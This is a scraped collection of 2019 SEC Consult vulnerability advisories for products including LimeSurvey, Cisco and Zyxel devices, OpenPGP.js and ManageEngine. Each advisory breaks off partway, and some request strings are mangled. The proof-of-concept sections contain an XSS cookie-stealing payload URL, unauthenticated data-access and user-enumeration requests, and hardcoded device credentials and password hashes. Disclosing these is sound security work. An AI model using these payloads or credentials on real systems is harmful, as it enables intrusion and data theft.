https://javaee.github.io/javaserverfaces-spec/ Business recommendation: By exploiting the vulnerability documented in this advisory, an attacker can execute arbitrary scripts in the context of the web application in the victim's browser. Besides performing arbitrary actions within the application with the victim's account or manipulating the application's interface, the attacker can potentially steal session tokens, redirect the victim to external pages and perform attacks against their browser. SEC Consult recommends users to implement the available patches. Vulnerability overview/description: --- The Mojarra implementation of JavaServer Faces (JSF) v2.2 and v2.3 lacks input validation on the javax.faces.ClientWindow parameter which can lead to reflected cross-site scripting (XSS) under certain conditions. Mojarra JSF v2.2 and v2.3 are respectively the user interface standards for Java EE 7 and Java EE 8. The vulnerability is not directly exploitable in Mojarra JSF v2.2 and v2.3. However, different frameworks based on this library and having a custom implementation of the Faces-Request HTTP headers for AJAX requests might be affected. PrimeFaces v6.0 is one example of a vulnerable framework. This vulnerability affects the web applications fulfilling the following conditions: - Usage of a framework based on Mojarra JSF v2.2 or v2.3 - Usage of AJAX requests in the web applications - Custom implementation of the Faces-Request HTTP headers for AJAX requests - Presence of the javax.faces.CLIENT_WINDOW_MODE context parameter set to "url" in the web.xml file: javax.faces.CLIENT_WINDOW_MODE url Proof of concept: - In this proof of concept, the tests are based on PrimeFaces v6.0, an open source framework for JSF. Other frameworks based on Mojarra JSF 2.2 or 2.3 might also be affected. Step 1: Generate an AJAX request on the web application and intercept it. --- POST /HelloPrimeFaces/faces/welcomePrimefaces.xhtml?jfwid=2a616ef87aeed7521b02ceb4e163:0 HTTP/1.1 Host: $IP Content-Length: 405 Accept: application/xml, text/xml, */*; q=0.01 Origin: http://$IP X-Requested-With: XMLHttpRequest Faces-Request: partial/ajax Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept-Encoding: gzip, deflate Accept-Language: fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: JSESSIONID=2a616ef87aeed7521b02ceb4e163 Connection: close javax.faces.partial.ajax=true=j_idt18%3AbtnSurname=j_idt18%3AbtnSurname+j_idt18%3Asurname=j_idt18%3Agrid_idt18%3AbtnSurname=j_idt18%3AbtnSurname_idt18=j_idt18_idt18%3Afirstname=_idt18%3Asurname=surname=7025249133904776332%3A-921340693957557245=2a616ef87aeed7521b02ceb4e163%3A0 --- Step 2: Transpose the POST parameters into GET parameters and build a new URL with it. http://$IP/HelloPrimeFaces/faces/welcomePrimefaces.xhtml?jfwid=2a616ef87aeed7521b02ceb4e163:0=true=j_idt18%3AbtnSurname=j_idt18%3AbtnSurname+j_idt18%3Asurname=j_idt18%3Agrid_idt18%3AbtnSurname=j_idt18%3AbtnSurname_idt18=j_idt18_idt18%3Afirstname=_idt18%3Asurname=surname=7025249133904776332%3A-921340693957557245=2a616ef87aeed7521b02ceb4e163%3A0 Step 3: Strip out the javax.faces.ViewState GET parameter from the URL. http://
SEC Consult SA-20190912-0 :: Stored and reflected XSS vulnerabilities in LimeSurvey
SEC Consult Vulnerability Lab Security Advisory < 20190912-0 > === title: Stored and reflected XSS vulnerabilities product: LimeSurvey vulnerable version: <= 3.17.13 fixed version: =>3.17.14 CVE number: CVE-2019-16172, CVE-2019-16173 impact: medium homepage: https://www.limesurvey.org/ found: 2019-08-23 by: Andreas Kolbeck (Office Munich) David Haintz (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "LimeSurvey is the tool to use for your online surveys. Whether you are conducting simple questionnaires with just a couple of questions or advanced assessments with conditionals and quota management, LimeSurvey has got you covered. LimeSurvey is 100% open source and will always be transparently developed. We can help you reach your goals." Source: https://www.limesurvey.org/ Business recommendation: LimeSurvey suffered from a vulnerability due to improper input and output validation. By exploiting this vulnerability an attacker could: 1. Attack other users of the web application with JavaScript code, browser exploits or Trojan horses, or 2. perform unauthorized actions in the name of another logged-in user. The vendor provides a patch which should be installed immediately. Furthermore, a thorough security analysis is highly recommended as only a short spot check has been performed and additional issues are to be expected. Vulnerability overview/description: --- 1) Stored and reflected XSS vulnerabilities LimeSurvey suffers from a stored and reflected cross-site scripting vulnerability, which allows an attacker to execute JavaScript code with the permissions of the victim. In this way it is possible to escalate privileges from a low-privileged account e.g. to "SuperAdmin". Proof of concept: - 1) Stored and reflected XSS vulnerabilities Example 1 - Stored XSS (CVE-2019-16172): The attacker needs the appropriate permissions in order to create new survey groups. Then create a survey group with a JavaScript payload in the title, for example: test When the survey group is being deleted, e.g. by an administrative user, the JavaScript code will be executed as part of the "success" message. Example 2 - Reflected XSS (CVE-2019-16173): The following proof of concept prints the current CSRF token cookie which contains the CSRF token. The parameter "surveyid" is not filtered properly: http://$host/index.php/admin/survey?mandatory=1=xxx=xxx%22%3E%3Cimg%20 src=x%20onerror=%22alert(document.cookie)%22%3E=listquestions=question If the URL schema is configured differently the following payload works: http://$host/index.php?r=admin/survey=1=xxx= xxx">=listquestions=question Vulnerable / tested versions: - The vulnerabilities have been verified to exist in version 3.17.9 and the latest version 3.17.13. It is assumed that older versions are affected as well. Vendor contact timeline: 2019-08-29: Contacting vendor through https://bugs.limesurvey.org/view.php?id=15204 2019-09-02: Fixes available: https://github.com/LimeSurvey/LimeSurvey/commit/32d6a5224327b246ee3a2a08500544e4f80f9a9a https://github.com/LimeSurvey/LimeSurvey/commit/f1c1ad2d24eb262363511fcca2e96ce737064006 2019-09-02: Release of LimeSurvey v3.17.14 which fixes the security issues 2019-09-03: Release of LimeSurvey v3.17.15 bug fix 2019-09-12: Coordinated release of security advisory Solution: - Update to version 3.17.15 or higher: https://www.limesurvey.org/stable-release The vendor provides a detailed list of changes here: https://www.limesurvey.org/limesurvey-updates/2188-limesurvey-3-17-14-build-190902-released Workaround: --- No workaround available. Advisory URL: - https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html ~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Europe | Asia | North America About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain
SEC Consult SA-20190904-0 :: Multiple vulnerabilities in Cisco router series RV34X, RV26X and RV16X
SEC Consult Vulnerability Lab Security Advisory < 20190904-0 > === title: Multiple vulnerabilities product: Cisco RV340, Cisco RV340W, Cisco RV345, Cisco RV345P, Cisco RV260, Cisco RV260P, Cisco RV260W, Cisco 160, Cisco 160W vulnerable version: Cisco RV34X - 1.0.02.16, Cisco RV16X/26X - 1.0.00.15 fixed version: see "Solution" CVE number: - impact: High homepage: https://www.cisco.com/ found: 2019-05-15 by: T. Weber, S. Viehböck (Office Vienna) IoT Inspector SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "Securely connecting your small business to the outside world is as important as connecting your internal network devices to one another. Cisco Small Business RV Series Routers offer virtual private networking (VPN) technology so your remote workers can connect to your network through a secure Internet pathway." Source: https://www.cisco.com/c/en/us/products/routers/small-business-rv-series-routers/index.html Business recommendation: We want to thank Cisco for the very quick and professional response and great coordination. Customers are urged to update the firmware of their devices. Vulnerability overview/description: --- 1) Hardcoded Credentials The device contains hardcoded users and passwords which can be used to login via SSH on an emulated device at least. During the communication with Cisco it turned out that: "Accounts like the 'debug-admin' and 'root' can not be accessed from console port, CLI or webui". Therefore, these accounts had no real functionality and cannot be used for malicious actions. 2) Known GNU glibc Vulnerabilities The used GNU glibc in version 2.19 is outdated and contains multiple known vulnerabilities. The outdated version was found by IoT Inspector. One of the discovered vulnerabilities (CVE-2015-7547, "getaddrinfo() buffer overflow") was verified by using the MEDUSA scalable firmware runtime. 3) Known BusyBox Vulnerabilities The used BusyBox toolkit in version 1.23.2 is outdated and contains multiple known vulnerabilities. The outdated version was found by IoT Inspector. One of the discovered vulnerabilities (CVE-2017-16544) was verified by using the MEDUSA scaleable firmware runtime. 4) Multiple Vulnerabilities - IoT Inspector Report Further information can be found in IoT Inspector report: https://r.sec-consult.com/ciscoiot Proof of concept: - 1) Hardcoded Credentials The following hardcoded hashes were found in the 'shadow' file of the firmware: root:$1$hPNSjUZA$7eKqEpqVYltt9xJ6f0OGf0:15533:0:9:7::: debug-admin:$1$.AAm0iJ4$na9wZwly9pSrdS8MhcGKw/:15541:0:9:7::: [...] The undocumented user 'debug-admin' is also contained in this file. Starting the dropbear daemon as background process on emulated firmware: --- # dropbear -E # [1109] Running in background # # [1112] Child connection from :52718 [1112] /var must be owned by user or root, and not writable by others [1112] Password auth succeeded for 'debug-admin' from :52718 --- Log on via another host connected to the same network. For this PoC the password of the debug-admin was changed in the 'shadow' file. --- [root@localhost medusa]# ssh debug-admin@ /bin/ash -i debug-admin@'s password: /bin/ash: can't access tty; job control turned off BusyBox v1.23.2 (2018-11-21 18:22:56 IST) built-in shell (ash) /tmp $ --- The 'debug-admin' user has the same privileges like 'root'. This can be determined from the corresponding sudoers file in the firmware: [...] ## User privilege specification ## root ALL=(ALL) ALL debug-admin ALL=(ALL) ALL ## Uncomment to allow members of group wheel to execute any command # %wheel ALL=(ALL) ALL [...] During the communication with Cisco it turned out that: "Accounts like the 'debug-admin' and 'root' can not be accessed from console port, CLI or webui". Therefore, these accounts had no real functionality and cannot be used for malicious actions. 2) Known GNU glibc Vulnerabilities GNU glibc version 2.19 contains multiple CVEs like: CVE-2014-4043, CVE-2014-9402, CVE-2014-9761, CVE-2014-9984, CVE-2015-1472, CVE-2015-5277, CVE-2015-8778, CVE-2015-87
SEC Consult SA-20190829-1 :: External DNS Requests in Zyxel USG/UAG/ATP/VPN/NXC series
SEC Consult Vulnerability Lab Security Advisory < 20190829-1 > === title: External DNS Requests product: Zyxel USG/UAG/ATP/VPN/NXC series vulnerable version: see "Vulnerable / tested version" fixed version: see "Solution" CVE number: - impact: medium homepage: https://www.zyxel.com found: 2019-06-19 by: Thomas Weber (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "Focused on innovation and customer-centricity, Zyxel Communications Corp. has been connecting people to the internet for nearly 30 years. We keep promoting creativity which meets the needs of customers. This spirit has never been changed since we developed the world's first integrated 3-in-1 data/fax/voice modem in 1992. Our ability to adapt and innovate with networking technology places us at the forefront of understanding connectivity for telco/service providers, businesses and home users. We're building the networks of tomorrow, helping unlock the world's potential and meeting the needs of the modern workplace; powering people at work, life and play. We stand side-by-side with our customers and partners to share new approaches to networking that will unleash their abilities. Loyal friend, powerful ally, reliable resource — we are Zyxel, Your Networking Ally." Source: https://www.zyxel.com/about_zyxel/company_overview.shtml Business recommendation: SEC Consult recommends Zyxel customers to upgrade the firmware to the latest version available. A thorough security review should be performed by security professionals to identify further potential security issues. Vulnerability overview/description: --- 1) Information Disclosure via Unauthenticated External DNS Requests A DNS request can be made by an unauthenticated attacker to either spam a DNS service of a third party with requests that have a spoofed origin or probe whether domain names are present on the internal network behind the firewall. Proof of concept: - 1) Information Disclosure via Unauthenticated External DNS Requests By sending the following POST request an attacker can probe for the domain "subdomain.domain.com": --- POST /redirect.cgi?original_url=http%3a%2f%2f192.168.1.1%2f HTTP/1.1 Host: 192.168.1.1 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en-US,en-GB;q=0.9,en;q=0.8 Connection: close Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Content-Length: 16 arip=subdomain.domain.com --- The following GET request can be used for the same purpose: --- GET /redirect.cgi?arip=subdomain.domain.com_url=http%3a%2f%2f192.168.1.1%2f HTTP/1.1 Host: 192.168.1.1 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en-US,en-GB;q=0.9,en;q=0.8 Connection: close Cache-Control: max-age=0 --- If the domain can be resolved, the response contains the resolved IP address within the cookie value: --- HTTP/1.1 200 OK Date: Mon, 24 Jun 2019 08:14:33 GMT Cache-Control: no-cache, private Pragma: no-cache Expires: Mon, 16 Apr 1973 13:10:00 GMT Set-Cookie: arip=; path=/ Set-Cookie: zy_pc_browser=1; path=/ Connection: close Content-Type: text/html Content-Length: 9099 [...] --- If the domain cannot be resolved, a redirection will be returned: --- HTTP/1.1 302 Found Date: Mon, 24 Jun 2019 08:11:57 GMT Location: ext-js/app/view/login/useraware.html Content-Length: 220 Connection: close Content-Type: text/html; charset=iso-8859-1 [...] --- Vulnerable / tested versions: - The following versions have been tested, other versions might be affected as well: Zyxel USG110ZLD 4.33 Zyxel USG210ZLD 4.33 Zyxel USG310ZLD 4.33 Zyxel USG1100 ZLD 4.33 Zyxel USG1900 ZLD 4.33 Zyxel USG2200-VPN ZLD 4.33 Zyxel UAG2100 ZLD 4.18 Zyxel UAG4100 ZLD 4.18 The vendor provided the following list of affected devices: Zyxel ATP200
SEC Consult SA-20190829-0 :: Hardcoded FTP Credentials in Zyxel NWA/NAP/WAC wireless access point series
SEC Consult Vulnerability Lab Security Advisory < 20190829-0 > === title: Hardcoded FTP Credentials product: Zyxel NWA/NAP/WAC wireless access point series vulnerable version: see "Vulnerable / tested version" fixed version: see "Solution" CVE number: - impact: medium homepage: https://www.zyxel.com found: 2019-06-19 by: Thomas Weber (Office Vienna) IoT Inspector SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "Focused on innovation and customer-centricity, Zyxel Communications Corp. has been connecting people to the internet for nearly 30 years. We keep promoting creativity which meets the needs of customers. This spirit has never been changed since we developed the world's first integrated 3-in-1 data/fax/voice modem in 1992. Our ability to adapt and innovate with networking technology places us at the forefront of understanding connectivity for telco/service providers, businesses and home users. We're building the networks of tomorrow, helping unlock the world's potential and meeting the needs of the modern workplace; powering people at work, life and play. We stand side-by-side with our customers and partners to share new approaches to networking that will unleash their abilities. Loyal friend, powerful ally, reliable resource — we are Zyxel, Your Networking Ally." Source: https://www.zyxel.com/about_zyxel/company_overview.shtml Business recommendation: SEC Consult recommends Zyxel customers to upgrade the firmware to the latest version available. A thorough security review should be performed by security professionals to identify further potential security issues. Vulnerability overview/description: --- 1) Hardcoded FTP Credentials An FTP service runs on the Zyxel wireless access point that contains the configuration file for the WiFi network. This FTP server can be accessed with hardcoded credentials that are embedded in the firmware of the AP. When the WiFi network is bound to another VLAN, an attacker can cross the network by fetching the credentials from the FTP server. The credentials were found by doing an automated scan with IoT Inspector. Proof of concept: - 1) Hardcoded FTP Credentials The username "devicehaecived" and the password "1234" can be used to access the FTP server of the AP on port 21. The content of the FTP server looks like the following listing: --- $ ls cert conf debug idp packet_trace script tmp wtp_image --- The directory "conf" contains all configuration files which store the WiFi SSIDs and passphrases. Vulnerable / tested versions: - The following versions have been manually tested and were automatically verified with IoT Inspector: Zyxel NWA5121-NI5.50 patch 0 and earlier Zyxel NWA5121-N 5.50 patch 0 and earlier The vendor provided the following list of affected devices: Zyxel WAC6103D-I5.50 patch 0 and earlier Zyxel WAC6303D-S5.50 patch 0 and earlier Zyxel WAC6502D-E5.50 patch 0 and earlier Zyxel WAC6502D-S5.50 patch 0 and earlier Zyxel WAC6503D-S5.50 patch 0 and earlier Zyxel WAC6553D-E5.50 patch 0 and earlier Zyxel WAC6552D-S5.50 patch 0 and earlier Zyxel WAC5302D-S5.50 patch 0 and earlier Zyxel NWA5123-AC5.50 patch 0 and earlier Zyxel NWA5123-AC HD 5.50 patch 0 and earlier Zyxel NWA5123-NI5.50 patch 0 and earlier Zyxel NWA5301-NJ5.50 patch 0 and earlier Zyxel NWA1302-AC5.50 patch 0 and earlier Zyxel NWA1123-ACv2 5.50 patch 0 and earlier Zyxel NWA1123-AC HD 5.50 patch 0 and earlier Zyxel NWA1123-AC PRO5.50 patch 0 and earlier Zyxel NAP1025.50 patch 0 and earlier Zyxel NAP2035.50 patch 0 and earlier Zyxel NAP3035.50 patch 0 and earlier Zyxel NAP3535.50 patch 0 and earlier Vendor contact timeline: 2019-06-26: Contacting vendor through secur...@zyxel.com.tw. 2019-06-27: Vendor changed PGP key. Sent advisory with new key. Vendor confirmed receipt. 2019-07-03: Asked for an update; Vendor told that they
SEC Consult SA-20190822-0 :: Multiple Vulnerabilities in OpenPGP.js
SEC Consult Vulnerability Lab Security Advisory < 20190822-0 > === title: Multiple Vulnerabilities product: OpenPGP.js vulnerable version: <=4.2.0 fixed version: 4.3.0 CVE number: CVE-2019-9153, CVE-2019-9154, CVE-2019-9155 impact: critical homepage: https://openpgpjs.org/ found: 2018-2019 by: Wolfgang Ettlinger (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "This project aims to provide an Open Source OpenPGP library in JavaScript so it can be used on virtually every device. Instead of other implementations that are aimed at using native code, OpenPGP.js is meant to bypass this requirement (i.e. people will not have to install gpg on their machines in order to use the library). The idea is to implement all the needed OpenPGP functionality in a JavaScript library that can be reused in other projects that provide browser extensions or server applications. It should allow you to sign, encrypt, decrypt, and verify any kind of text - in particular e-mails - as well as managing keys." URL: https://openpgpjs.org/ Business recommendation: SEC Consult was tasked by the German Bundesamt für Sicherheit in der Informationstechnik (BSI) with conducting a security audit of the Mailvelope browser extension as well as the parts of OpenPGP.js used by Mailvelope. During the course of this audit multiple security vulnerabilities with severities ranging from minor to critical have been identified. Some of the vulnerabilities with higher severity are published as an advisory. A more detailed description of the vulnerabilities as well as a description of other vulnerabilities found during this project can be found in the report that has been made available by the BSI: https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Publications/Studies/Mailvelope_Extensions/Mailvelope_Extensions_pdf.html Vulnerability overview/description: --- 1) Message Signature Bypass (CVE-2019-9153) OpenPGP defines several types of signatures with each type carrying a different semantic. Signatures are implemented as packets and each signature packet can contain subpackets. To indicate a message signature (e.g. a signed e-mail), the signature type "text" is used. The text signature packet verifies both its subpackets as well as the signed text. During verification of a message signature, OpenPGP.js does not verify that the signature is of type text. An attacker could therefore construct a message that, instead of a text signature, contains a signature of another type. As the input required for the verification process depends on the signature type, an attacker could use a signature with a type that only verifies its subpackets and does not require additional input. An attacker could construct a message that contains a valid "standalone" or "timestamp" signature packet signed by another person. OpenPGP.js would incorrectly assume this message to be signed by that person. 2) Information from Unhashed Subpackets is Trusted (CVE-2019-9154) OpenPGP signature subpackets contain information related to a signature (e.g. the creation timestamp). These subpackets may appear in a "hashed" and "unhashed" subpacket container. While the information in the hashed subpackets is signed, the unhashed subpackets are not cryptographically protected. OpenPGP.js however does not distinguish between these subpackets. When parsing a signature packet, the signed information is parsed first. When the unhashed packets are read, the information from the hashed packets is overwritten. An attacker could arbitrarily modify the contents of e.g. a key certification signature or revocation signature. As a result, the attacker could e.g. convince a victim to use an obsolete key for encryption. 3) Invalid Curve Attack (CVE-2019-9155) The implementation of the Elliptic Curve Diffie-Hellman (ECDH) key exchange algorithm does not verify that the communication partner's public key is valid (i.e. that the point lies on the elliptic curve). This causes the application to implicitly calculate the resulting secret key not based on the specified elliptic curve but rather an altered curve. By carefully choosing multiple altered curves (and therefore the resulting public key), and observing whether decryption fails, an attacker can extract the victim's private key. This attack requires the attacker to be able to provide multiple manipulated messages and to observe whether decryption fails. Proof of concept: ---
SEC Consult SA-20190821-0 :: Unauthenticated sensitive information leakage in Zoho Corporation ManageEngine ServiceDesk Plus
SEC Consult Vulnerability Lab Security Advisory < 20190821-0 > === title: Unauthenticated sensitive information leakage product: Zoho Corporation ManageEngine ServiceDesk Plus vulnerable version: v10 <10509 fixed version: v10 >=10509 CVE number: CVE-2019-15045, CVE-2019-15046 impact: Critical homepage: https://www.manageengine.com/products/service-desk/ found: 2019-06-27 by: Johannes Greil (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "ServiceDesk Plus is a game changer in turning IT teams from daily fire-fighting to delivering awesome customer service. It provides great visibility and central control in dealing with IT issues to ensure that businesses suffer no downtime. For 10 years and running, it has been delivering smiles to millions of IT folks, end users, and stakeholders alike." Source: https://www.manageengine.com/products/service-desk/ Business recommendation: The vendor provides a patched version and it should be installed immediately. Furthermore, a thorough security analysis is highly recommended as only a short spot check has been performed and further critical issues are to be expected. A workaround exists for mitigating vulnerability 1b (user enumeration). Vulnerability overview/description: --- 1) Unauthenticated sensitive information leakage a) Unauthenticated download of internal support ticket information (CVE-2019-15046) The software offers functionality (fosagent) that an unauthenticated attacker can exploit in order to gain information of internal "events". In our test it was possible to access sensitive internal information (tickets) written by users of this application in exchange with the support team. Depending on the contents of the tickets, sensitive data might leak through this functionality. It is likely, that it also depends on the configuration of ServiceDesk Plus which information is stored in those "events". b) User Enumeration in AjaxDomainServlet (CVE-2019-15045) It is possible to collect valid usernames by interacting with the "AjaxDomainServlet" function of the application without prior authentication. This vulnerability is useful to increase the efficiency of brute force attacks. If the username is known, it is easier to find the corresponding password. Furthermore, the servlet leaks information, whether the user is a locally configured or a domain user and it also leaks the internal domain names of the requested user account. According to the vendor, the affected feature is intended behaviour and a workaround in order to disable it has been provided (see further below). Proof of concept: - 1) Unauthenticated sensitive information leakage a) Unauthenticated download of internal support ticket information (CVE-2019-15046) The "fosagent" functionality provides a "download-file" servlet which an unauthenticated attacker can use in order to iterate through existing internal "events". The information that can be downloaded looks like internal ticket system information and other data exchanged between users and the help desk support team. It is necessary to supply the "log-pos" parameter given a number followed by a colon character and another number to access the corresponding event index. An attacker can just increment those numbers and access different information. https://$IP/fosagent/repl/download-file?log-pos=1:0 b) User Enumeration in AjaxDomainServlet (CVE-2019-15045) The following URL can be used to efficiently enumerate user accounts configured within ManageEngine ServiceDesk Plus. No prior authentication is required for this functionality. The "search" parameter is used for supplying the user account name. https://$IP/domainServlet/AJaxDomainServlet?action=searchLocalAuthDomain=$USER If the user exists and is a local user (configured within the web application) it will show "Not in Domain" as a result. If the user exists and is a domain user (e.g. LDAP) it will show the corresponding internal domain name as a result. If the page stays empty the user does not exist. Vulnerable / tested versions: - Version 10 has been tested. The vendor did not confirm whether older releases are affected as well. Vendor contact timeline: 2019-07-02: Contacting vendor through ManageEngine Security Response Center (MESRC) Uploaded security ad
SEC Consult SA-20190612-0 :: Multiple vulnerabilities in WAGO 852 Industrial Managed Switch Series
SEC Consult Vulnerability Lab Security Advisory < 20190612-0 > === title: Multiple vulnerabilities product: WAGO 852 Industrial Managed Switch Series vulnerable version: 852-303: https://www.wago.com found: 2019-03-08 by: T. Weber (Office Vienna) IoT Inspector SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "New ideas are the driving force behind our success WAGO is a family-owned company headquartered in Minden, Germany. Independently operating for three generations, WAGO is the global leader of spring pressure electrical interconnect and automation solutions. For more than 60 years, WAGO has developed and produced innovative products for packaging, transportation, process, industrial and building automation markets amongst others. Aside from its innovations in spring pressure connection technology, WAGO has introduced numerous innovations that have revolutionized industry. Further ground-breaking inventions include: the WAGO-I/O-SYSTEM®, TOPJOB S® and WALL-NUTS®." Source: http://www.wago.us/wago/ Business recommendation: SEC Consult recommends to immediately apply the available patches from the vendor. A thorough security review should be performed by security professionals to identify further potential security issues. Vulnerability overview/description: --- The industrial managed switch series 852 from WAGO is affected by multiple vulnerabilities such as old software components embedded in the firmware. Furthermore, hardcoded password hashes and credentials were also found by doing an automated scan with IoT Inspector. Two vulnerabilities (CVE-2017-16544 and CVE-2015-0235) were verified by emulating the device with the MEDUSA scaleable firmware runtime. The validity of the password hashes and the embedded keys were also verified by emulating the device. 1) Known BusyBox Vulnerabilities The used BusyBox toolkit in version 1.12.0 is outdated and contains multiple known vulnerabilities. The outdated version was found by IoT Inspector. One of the discovered vulnerabilities (CVE-2017-16544) was verified by using the MEDUSA scaleable firmware runtime. 2) Known GNU glibc Vulnerabilities The used GNU glibc in version 2.8 is outdated and contains multiple known vulnerabilities. The outdated version was found by IoT Inspector. One of the discovered vulnerabilities (CVE-2015-0235, "GHOST") was verified by using the MEDUSA scaleable firmware runtime. 3) Hardcoded Credentials (CVE-2019-12550) The device contains hardcoded users and passwords which can be used to login via SSH and Telnet. 4) Embedded Private Keys (CVE-2019-12549) The device contains hardcoded private keys for the SSH daemon. The fingerprint of the SSH host key from the corresponding SSH daemon matches to the embedded private key. Proof of concept: - 1) Known BusyBox Vulnerabilities BusyBox version 1.12.0 contains multiple CVEs like: CVE-2013-1813, CVE-2016-2148, CVE-2016-6301, CVE-2011-2716, CVE-2011-5325, CVE-2015-9261, CVE-2016-2147 and more. The BusyBox shell autocompletion vulnerability (CVE-2017-16544) was verified on an emulated device. A file with the name "\ectest\n\e]55;test.txt\a" was created to trigger the vulnerability. --- # ls "pressing " test ]55;test.txt # --- 2) Known GNU glibc Vulnerabilities GNU glibc version 2.8 contains multiple CVEs like: CVE-2010-0296, CVE-2010-3856, CVE-2012-4412, CVE-2014-4043, CVE-2014-9402, CVE-2014-9761, CVE-2014-9984, CVE-2015-1472 and more. The gethostbyname buffer overflow vulnerability (GHOST) was checked with the help of the exploit code from https://seclists.org/oss-sec/2015/q1/274. It was compiled and executed on the emulated device to test the system. 3) Hardcoded Credentials (CVE-2019-12550) The following credentials were found in the 'passwd' file of the firmware: root No password is set for the account [EMPTY PASSWORD] admin By using these credentials, it's possible to connect via Telnet and SSH on the emulated device. Example for Telnet: --- [root@localhost ~]# telnet 192.168.0.133 Trying 192.168.0.133... Connected to 192.168.0.133. Escape cha
SEC Consult SA-20190515-0 :: Authorization Bypass in RSA NetWitness (@sec_consult)
SEC Consult Vulnerability Lab Security Advisory < 20190515-0 > === title: Authorization Bypass product: RSA NetWitness vulnerable version: <10.6.6.1, <11.2.1.1 fixed version: 10.6.6.1, 11.2.1.1 CVE number: CVE-2019-3724 impact: Medium homepage: https://www.rsa.com found: 2018-09-18 by: Mantas Juskauskas (Office Vilnius) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "RSA provides more than 30,000 customers around the world with the essential security capabilities to protect their most valuable assets from cyber threats. With RSA's award-winning products, organizations effectively detect, investigate, and respond to advanced attacks; confirm and manage identities; and ultimately, reduce IP theft, fraud, and cybercrime." Source: https://www.rsa.com/en-us/company/about Business recommendation: By exploiting the vulnerability documented in this advisory an unauthorized attacker can access an administrative resource that may contain plain text credentials to a 3rd party system. The vendor provides a patch which should be installed on affected systems. Vulnerability overview/description: --- The authorization mechanism provided by the platform is prone to an authorization bypass vulnerability, which can be easily exploited by authenticated (but low privileged) remote attackers for gaining access to administrative information including plaintext passwords. Proof of concept: - A logged-in low privileged user (e.g. with role Analyst) is able to access an administrative resource by calling the following URL: https://[host]/admin/system/whois/properties After the above URL is accessed, the server returns the following HTTP response that contains sensitive information to a 3rd party whois service including plaintext passwords: HTTP/1.1 200 OK Server: nginx Date: [snip] Content-Type: application/json;charset=UTF-8 Connection: close X-Frame-Options: SAMEORIGIN Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 ; includeSubDomains X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Set-Cookie: [snip] Content-Length: 795 {"success":true,"data":{"queryUrl":"https://[snip]","authUrl":"https://[snip]","userId":"[snip]","pw":"[snip]","allowedRequests":100,"allowedRequestsInterval":60,"queueMaxSize":10,"cacheMaxSize":5,"refreshInterval":30,"waitForHttpRequests":true,"settings":{"query-url":"https://[snip]","queue-max-size":10,"password":"[snip]","allowed-requests":100,"auth-url":"https://[snip]","user-id":"[snip]","refresh-interval-seconds":{"seconds":2592000,"milliSeconds":259200},"cache-max-size":5,"wait-for-http-request":true,"allowed-requests-interval-seconds":{"seconds":60,"milliSeconds":6 Vulnerable / tested versions: - The identified vulnerability has been verified to exist in the RSA NetWitness platform, version 11.1.0.1. According to the vendor, platform version 10 is also affected. The following versions are vulnerable: * <10.6.6.1 * <11.2.1.1 Vendor contact timeline: 2018-10-01: Contacting vendor through PGP via sec...@dell.com 2018-10-02: Vendor acknowledges the information was received, forwards the info to the relevant department 2018-10-11: Vendor confirms the impact of the authorization issue, starts to work on the remediation timeline 2018-10-15: Vendor provides additional information 2018-10-22: Contacting vendor to provide the remediation timeline 2018-10-23: Further email exchange related to the remediation timeline 2019-01-18: Vendor provides an update on the fix timeline 2019-03-05: Asking for a status update 2019-03-06: Vendor provides a status update on the release, patch for platform version 11 will be released in March, version 10 Mid-April 2019-04-01: Asking for a specific release date & further status update 2019-04-01: Vendor: release is scheduled for 23rd April 2019, but may change, they will inform us 2019-05
SEC Consult SA-20190513-0 :: Cleartext message spoofing in supplementary Go Cryptography Libraries (@sec_consult)
SEC Consult Vulnerability Lab Security Advisory < 20190513-0 > === title: Cleartext message spoofing product: Supplementary Go Cryptography Libraries vulnerable version: commit a5d413f7728c81fb97d96a2b722368945f651e78 branch master (https://github.com/golang/crypto.git) fixed version: commit c05e17bb3b2dca130fc919668a96b4bec9eb9442 CVE number: CVE-2019-11841 impact: High homepage: https://golang.org found: 2019-03-28 by: Aida Mynzhasova (Office Berlin) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "Package clearsign generates and processes OpenPGP, clear-signed data. See RFC 4880, section 7. Clearsigned messages are cryptographically signed, but the contents of the message are kept in plaintext so that it can be read without special tools." Source: https://godoc.org/golang.org/x/crypto/openpgp/clearsign Business recommendation: During a short security test, SEC Consult found a severe security vulnerability in the clearsign package of supplementary Go cryptography libraries. This vulnerability could allow an attacker: - to lead a victim to believe the signature was generated using a different message digest algorithm than what was actually used; - to spoof clearsign OpenPGP messages by prepending arbitrary text to cleartext messages without invalidating the signatures. Vulnerability overview/description: --- 1) Cleartext message spoofing According to RFC 4880 